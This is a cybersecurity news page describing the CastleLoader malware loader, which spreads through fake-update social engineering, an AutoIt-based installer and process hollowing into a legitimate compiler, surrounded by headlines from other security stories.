Wednesday , June 24 2026
CastleLoader

CastleLoader Malware To Attack US Government Agencies and Critical Infra

infosecbulletin Thursday , January 15 2026 Cyber Attack

A dangerous malware loader dubbed CastleLoader poses a serious risk to US government agencies and critical infrastructure. First detected in early 2025, it has been used to gain initial access in coordinated attacks on federal agencies, IT firms, logistics companies, and essential infrastructure in North America and Europe.

Security researchers noted that one CastleLoader campaign affected around 460 different organizations.

LastPass says hackers stole customer data via Klue, supply chain breach

By infosecbulletin / Tuesday , June 23 2026
LastPass has reported a security issue with its vendor, Klue. This incident allowed an attacker unauthorized access to customer data....
Read More
LastPass says hackers stole customer data via Klue, supply chain breach

New Apple Exploit Bypasses Boot Defenses, Possibly Affects Millions of iPhones Worldwide

By infosecbulletin / Tuesday , June 23 2026
Researchers at cybersecurity firm Paradigm Shift found a new flaw called usbliter8. This flaw can get around main boot protections...
Read More
New Apple Exploit Bypasses Boot Defenses, Possibly Affects Millions of iPhones Worldwide

India’s Tata Electronics hit by cyber breach: Hacker target 630 GB record

By infosecbulletin / Tuesday , June 23 2026
A cyber attack seems to have affected one of India's top electronics companies. Tata Electronics has said there was a...
Read More
India’s Tata Electronics hit by cyber breach: Hacker target 630 GB record

Anthropic’s Mythos reportedly broke NSA classified systems in hours

By infosecbulletin / Monday , June 22 2026
The recent finding shows how powerful Mythos is: the AI can access the US government's secret networks in just a...
Read More
Anthropic’s Mythos reportedly broke NSA classified systems in hours

OpenAI New Method “Deployment Simulation” Predicts AI Risks Before Deployment

By infosecbulletin / Monday , June 22 2026
Test before going live is important for AI developers. But there's a problem: testing usually uses fake scenarios that often...
Read More
OpenAI New Method “Deployment Simulation” Predicts AI Risks Before Deployment

AryStinger botnet infected thousands of D-Link routers globally

By infosecbulletin / Sunday , June 21 2026
AryStinger has taken control of over 4,000 old D-Link routers to use them as proxies for harmful traffic. The team...
Read More
AryStinger botnet infected thousands of D-Link routers globally

Hacker suspected of sending alerts across Brazil

By infosecbulletin / Sunday , June 21 2026
Brazil's government suspects a hacking attack triggered an unauthorized ‌alert sent to cell phones across parts of the country early...
Read More
Hacker suspected of sending alerts across Brazil

CyberSentinel AI features 33 security tools like Nmap, SQLMap, and ZAP, utilizing Claude and GPT

By infosecbulletin / Sunday , June 21 2026
A new open-source cybersecurity tool named CyberSentinel AI v3.0 has come out. It is an important step in self-operated security...
Read More
CyberSentinel AI features 33 security tools like Nmap, SQLMap, and ZAP, utilizing Claude and GPT

Barracuda hosts Dhaka roundtable on cyber resilience

By infosecbulletin / Saturday , June 20 2026
Barracuda gathered industry people in Dhaka on 18 June 2026 for a roundtable talk about cyber resilience. The company shared...
Read More
Barracuda hosts Dhaka roundtable on cyber resilience

CISA Alerts Fortinet Users as FortiBleed Affects 86,644 FortiGate Devices

By infosecbulletin / Saturday , June 20 2026
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) asked Fortinet users with FortiGate devices on Thursday to act to protect...
Read More
CISA Alerts Fortinet Users as FortiBleed Affects 86,644 FortiGate Devices

CastleLoader often uses social engineering, employing ClickFix methods to deceive victims with fake software updates or system verification alerts. When users respond to these fake messages, they unknowingly execute harmful commands that activate CastleLoader.

The launch of CastleLoader sample showing suspicious processes and network activities detected (Source – Any.Run)

Any.Run analysts found that the malware has a complex structure aimed at avoiding modern security systems. The analysis showed that CastleLoader is not just a straightforward executable; it uses a complex method that makes each stage seem harmless at first glance.

This method helps the malware spread its harmful actions across several normal-looking processes, allowing it to go unnoticed. CastleLoader’s infection mechanism represents a masterclass in stealth and obfuscation.

Malware is delivered as an Inno Setup installer file that includes components like AutoIt3.exe and a compiled AutoIt script named freely.a3x.

CastleLoader installer (Source – Any.Run)

The AutoIt script starts the next phase by launching jsc.exe, a legitimate JScript.NET compiler, with the CREATE_SUSPENDED flag to pause it right after creation.

The malware uses a refined process hollowing technique to inject a complete PE executable into the jsc.exe memory space instead of executing in a suspended state. Click here to read the full report.

Check Also

Texas

Texas data breach exposes 3 million driver’s licenses

The Texas Parks and Wildlife Department (TPWD) revealed a data leak at its license system …

Mail: [email protected]
© Copyright 2026, All Rights Reserved InfoSecBulletin